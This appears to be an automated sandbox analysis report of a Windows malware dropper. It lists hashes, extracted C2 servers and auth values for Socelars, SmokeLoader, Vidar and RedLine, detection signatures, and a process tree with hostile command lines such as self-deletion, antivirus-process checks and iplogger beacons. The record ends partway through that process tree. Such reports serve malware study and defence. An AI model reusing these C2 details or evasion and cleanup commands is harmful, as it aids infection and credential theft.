Analysis

  • max time kernel
    57s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    13-03-2022 23:30

General

  • Target

    e36c1601ad2dc41c757c3add4d0c1d0a1f165eb9482d491b5daa65a524c8a359.exe

  • Size

    6.6MB

  • MD5

    ca0b40ca420c8fdb76f785486eb8e4f5

  • SHA1

    246b67f65688689e47e02d7a3617321ba12e179c

  • SHA256

    e36c1601ad2dc41c757c3add4d0c1d0a1f165eb9482d491b5daa65a524c8a359

  • SHA512

    d7a740eecc8d7b01592510ca71143428a2cac86a4a55db7f71d6dd7b3687de309ed588a0d4d2f703c670d19f9bf3d2c289093074702487daf07995d70b761c43

Malware Config

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.wygexde.xyz/

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

39.4

Botnet

706

C2

https://sergeevih43.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

redline

Botnet

DomAni2

C2

flestriche.xyz:80

Extracted

Family

redline

Botnet

ruzki000

C2

86.107.197.196:63065

Attributes
  • auth_value

    80fac7f67bd38aa709bbeef7a44ccb47

Extracted

Family

redline

Botnet

ruzki12_03

C2

176.122.23.55:11768

Attributes
  • auth_value

    c51ddc8008e8581a01cec6e8291c5530

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE Danabot Key Exchange Request

    suricata: ET MALWARE Danabot Key Exchange Request

  • suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

    suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

  • suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)

    suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)

  • suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6

    suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6

  • suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

    suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 10 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 9 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 29 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 4 IoCs
  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 28 IoCs
  • Suspicious use of SendNotifyMessage 23 IoCs
  • Suspicious use of SetWindowsHookEx 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e36c1601ad2dc41c757c3add4d0c1d0a1f165eb9482d491b5daa65a524c8a359.exe
    "C:\Users\Admin\AppData\Local\Temp\e36c1601ad2dc41c757c3add4d0c1d0a1f165eb9482d491b5daa65a524c8a359.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3728
    • C:\Users\Admin\AppData\Local\Temp\Files.exe
      "C:\Users\Admin\AppData\Local\Temp\Files.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3548
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:820
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Rxji7
        3⤵
          PID:1672
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xb4,0x108,0x7ffc876c46f8,0x7ffc876c4708,0x7ffc876c4718
            4⤵
              PID:2804
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij7
          2⤵
          • Enumerates system info in registry
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:408
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc876c46f8,0x7ffc876c4708,0x7ffc876c4718
            3⤵
              PID:1076
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,14050729980899890552,7419569400211335494,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2
              3⤵
                PID:64
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,14050729980899890552,7419569400211335494,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3
                3⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:1740
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,14050729980899890552,7419569400211335494,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:8
                3⤵
                  PID:4248
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14050729980899890552,7419569400211335494,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
                  3⤵
                    PID:376
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14050729980899890552,7419569400211335494,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
                    3⤵
                      PID:4112
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14050729980899890552,7419569400211335494,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3992 /prefetch:1
                      3⤵
                        PID:2644
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2056,14050729980899890552,7419569400211335494,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5320 /prefetch:8
                        3⤵
                          PID:3684
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14050729980899890552,7419569400211335494,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1
                          3⤵
                            PID:3400
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14050729980899890552,7419569400211335494,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
                            3⤵
                              PID:3932
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,14050729980899890552,7419569400211335494,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6032 /prefetch:1
                              3⤵
                                PID:1508
                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,14050729980899890552,7419569400211335494,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6280 /prefetch:8
                                3⤵
                                  PID:5420
                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                                  3⤵
                                    PID:6420
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x228,0x22c,0x230,0x204,0x234,0x7ff6628b5460,0x7ff6628b5470,0x7ff6628b5480
                                      4⤵
                                        PID:1944
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,14050729980899890552,7419569400211335494,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6280 /prefetch:8
                                      3⤵
                                        PID:6416
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,14050729980899890552,7419569400211335494,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4936 /prefetch:2
                                        3⤵
                                          PID:604
                                      • C:\Users\Admin\AppData\Local\Temp\Folder.exe
                                        "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Checks computer location settings
                                        • Suspicious use of WriteProcessMemory
                                        PID:1052
                                        • C:\Users\Admin\AppData\Local\Temp\Folder.exe
                                          "C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
                                          3⤵
                                            PID:1860
                                        • C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe
                                          "C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          PID:1664
                                        • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                          "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of WriteProcessMemory
                                          PID:2044
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /c taskkill /f /im chrome.exe
                                            3⤵
                                              PID:632
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /f /im chrome.exe
                                                4⤵
                                                • Kills process with taskkill
                                                PID:768
                                          • C:\Users\Admin\AppData\Local\Temp\Info.exe
                                            "C:\Users\Admin\AppData\Local\Temp\Info.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Checks computer location settings
                                            • Suspicious use of SetWindowsHookEx
                                            PID:2772
                                            • C:\Users\Admin\Documents\mT34i6CeKvE5G8ALAuysZw62.exe
                                              "C:\Users\Admin\Documents\mT34i6CeKvE5G8ALAuysZw62.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Checks BIOS information in registry
                                              • Checks whether UAC is enabled
                                              • Suspicious use of SetThreadContext
                                              • Suspicious use of SetWindowsHookEx
                                              PID:5128
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                4⤵
                                                • Suspicious use of SetWindowsHookEx
                                                PID:5288
                                            • C:\Users\Admin\Documents\4Gm9Dw7pkdcaM6V2PBsVaPBp.exe
                                              "C:\Users\Admin\Documents\4Gm9Dw7pkdcaM6V2PBsVaPBp.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Checks computer location settings
                                              PID:3588
                                              • C:\Users\Admin\AppData\Local\Temp\e494d822-7bf8-4d75-a71d-89d788c7d888.exe
                                                "C:\Users\Admin\AppData\Local\Temp\e494d822-7bf8-4d75-a71d-89d788c7d888.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                PID:5176
                                            • C:\Users\Admin\Documents\i0Srf3oCwVTugVe_2tFlOZDN.exe
                                              "C:\Users\Admin\Documents\i0Srf3oCwVTugVe_2tFlOZDN.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • Suspicious use of SetWindowsHookEx
                                              PID:4440
                                            • C:\Users\Admin\Documents\St8_sXvmSQZGXi9weTomoeF4.exe
                                              "C:\Users\Admin\Documents\St8_sXvmSQZGXi9weTomoeF4.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Checks BIOS information in registry
                                              • Checks whether UAC is enabled
                                              • Suspicious use of SetThreadContext
                                              • Suspicious use of SetWindowsHookEx
                                              PID:4828
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                4⤵
                                                • Suspicious use of SetWindowsHookEx
                                                PID:5416
                                            • C:\Users\Admin\Documents\fKSggZWO2nyhgfKQzKDvpN40.exe
                                              "C:\Users\Admin\Documents\fKSggZWO2nyhgfKQzKDvpN40.exe"
                                              3⤵
                                                PID:1272
                                              • C:\Users\Admin\Documents\lkUXZGmdQKQV0TdsiUHsoVf9.exe
                                                "C:\Users\Admin\Documents\lkUXZGmdQKQV0TdsiUHsoVf9.exe"
                                                3⤵
                                                  PID:5232
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                    4⤵
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:5428
                                                • C:\Users\Admin\Documents\c4sBoadpkj4TSt3Ee6rwQ4iN.exe
                                                  "C:\Users\Admin\Documents\c4sBoadpkj4TSt3Ee6rwQ4iN.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:5224
                                                  • C:\Users\Admin\Documents\c4sBoadpkj4TSt3Ee6rwQ4iN.exe
                                                    "C:\Users\Admin\Documents\c4sBoadpkj4TSt3Ee6rwQ4iN.exe"
                                                    4⤵
                                                      PID:6208
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 6208 -s 580
                                                        5⤵
                                                        • Program crash
                                                        PID:6892
                                                  • C:\Users\Admin\Documents\2bSakoLPc6T6a7bQ30wLNCHK.exe
                                                    "C:\Users\Admin\Documents\2bSakoLPc6T6a7bQ30wLNCHK.exe"
                                                    3⤵
                                                      PID:5208
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im 2bSakoLPc6T6a7bQ30wLNCHK.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\2bSakoLPc6T6a7bQ30wLNCHK.exe" & del C:\ProgramData\*.dll & exit
                                                        4⤵
                                                          PID:6500
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /im 2bSakoLPc6T6a7bQ30wLNCHK.exe /f
                                                            5⤵
                                                            • Kills process with taskkill
                                                            PID:6772
                                                          • C:\Windows\SysWOW64\timeout.exe
                                                            timeout /t 6
                                                            5⤵
                                                            • Delays execution with timeout.exe
                                                            PID:6308
                                                      • C:\Users\Admin\Documents\DHTxA5dpbRRQEpgXvQlBvDJ4.exe
                                                        "C:\Users\Admin\Documents\DHTxA5dpbRRQEpgXvQlBvDJ4.exe"
                                                        3⤵
                                                          PID:5200
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                            4⤵
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:4564
                                                        • C:\Users\Admin\Documents\xuu0Ubu5qpxt8EykJbCwopZ9.exe
                                                          "C:\Users\Admin\Documents\xuu0Ubu5qpxt8EykJbCwopZ9.exe"
                                                          3⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:5192
                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                            "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                                            4⤵
                                                              PID:6812
                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                              "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                                              4⤵
                                                                PID:2844
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 624
                                                                4⤵
                                                                • Program crash
                                                                PID:5144
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 1036
                                                                4⤵
                                                                • Program crash
                                                                PID:6276
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5192 -s 1008
                                                                4⤵
                                                                • Executes dropped EXE
                                                                • Program crash
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:5208
                                                            • C:\Users\Admin\Documents\BXn_cjiGhHY0V2LcFF3qMvoc.exe
                                                              "C:\Users\Admin\Documents\BXn_cjiGhHY0V2LcFF3qMvoc.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:5392
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 452
                                                                4⤵
                                                                • Program crash
                                                                PID:2032
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 632
                                                                4⤵
                                                                • Program crash
                                                                PID:3308
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 596
                                                                4⤵
                                                                • Program crash
                                                                PID:6272
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 816
                                                                4⤵
                                                                • Program crash
                                                                PID:5476
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 780
                                                                4⤵
                                                                • Program crash
                                                                PID:2832
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 1256
                                                                4⤵
                                                                • Program crash
                                                                • Suspicious use of FindShellTrayWindow
                                                                • Suspicious use of SendNotifyMessage
                                                                PID:820
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 1192
                                                                4⤵
                                                                • Program crash
                                                                PID:6644
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "BXn_cjiGhHY0V2LcFF3qMvoc.exe" /f & erase "C:\Users\Admin\Documents\BXn_cjiGhHY0V2LcFF3qMvoc.exe" & exit
                                                                4⤵
                                                                  PID:4344
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /im "BXn_cjiGhHY0V2LcFF3qMvoc.exe" /f
                                                                    5⤵
                                                                    • Kills process with taskkill
                                                                    PID:6232
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 1280
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:6708
                                                              • C:\Users\Admin\Documents\dvSiqFeIFRz229hfAaN4LI84.exe
                                                                "C:\Users\Admin\Documents\dvSiqFeIFRz229hfAaN4LI84.exe"
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Checks BIOS information in registry
                                                                • Checks whether UAC is enabled
                                                                • Suspicious use of SetThreadContext
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:5564
                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                  4⤵
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:4444
                                                              • C:\Users\Admin\Documents\i9uTvWSuzSpZXB52IoirKtrf.exe
                                                                "C:\Users\Admin\Documents\i9uTvWSuzSpZXB52IoirKtrf.exe"
                                                                3⤵
                                                                  PID:5528
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 924
                                                                    4⤵
                                                                    • Program crash
                                                                    PID:4204
                                                                • C:\Users\Admin\Documents\sfjV0yeXcM_LKnVySqy3ADc9.exe
                                                                  "C:\Users\Admin\Documents\sfjV0yeXcM_LKnVySqy3ADc9.exe"
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  PID:5488
                                                                • C:\Users\Admin\Documents\jmf2RHzogxsHIDtAMMUGxN3s.exe
                                                                  "C:\Users\Admin\Documents\jmf2RHzogxsHIDtAMMUGxN3s.exe"
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Checks computer location settings
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:5480
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
                                                                    4⤵
                                                                      PID:5908
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd
                                                                        5⤵
                                                                          PID:448
                                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                                            tasklist /FI "imagename eq BullGuardCore.exe"
                                                                            6⤵
                                                                            • Enumerates processes with tasklist
                                                                            PID:6540
                                                                          • C:\Windows\SysWOW64\find.exe
                                                                            find /I /N "bullguardcore.exe"
                                                                            6⤵
                                                                              PID:6232
                                                                            • C:\Windows\SysWOW64\tasklist.exe
                                                                              tasklist /FI "imagename eq PSUAService.exe"
                                                                              6⤵
                                                                              • Enumerates processes with tasklist
                                                                              PID:4308
                                                                            • C:\Windows\SysWOW64\find.exe
                                                                              find /I /N "psuaservice.exe"
                                                                              6⤵
                                                                                PID:4432
                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
                                                                                6⤵
                                                                                  PID:6228
                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
